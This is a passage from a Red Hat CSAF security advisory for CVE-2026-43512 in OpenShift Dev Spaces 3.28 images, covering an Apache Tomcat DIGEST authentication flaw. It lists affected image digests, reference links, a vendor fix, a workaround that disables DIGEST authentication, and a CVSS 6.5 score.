"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-43512"
},
{
"category": "external",
"summary": "RHBZ#2476511",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2476511"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-43512",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-43512"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-43512",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43512"
},
{
"category": "external",
"summary": "https://lists.apache.org/thread/7x09x7o12solvclslw3sz0288xc8wx73",
"url": "https://lists.apache.org/thread/7x09x7o12solvclslw3sz0288xc8wx73"
}
],
"release_date": "2026-05-12T15:24:02.424000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T19:42:14+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25123"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable DIGEST authentication within Apache Tomcat if it is not essential for your environment. This involves modifying the server\u0027s authentication configuration to utilize alternative methods or remove the DIGEST realm. A service restart is required for these changes to take effect and may impact functionality relying on DIGEST authentication.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
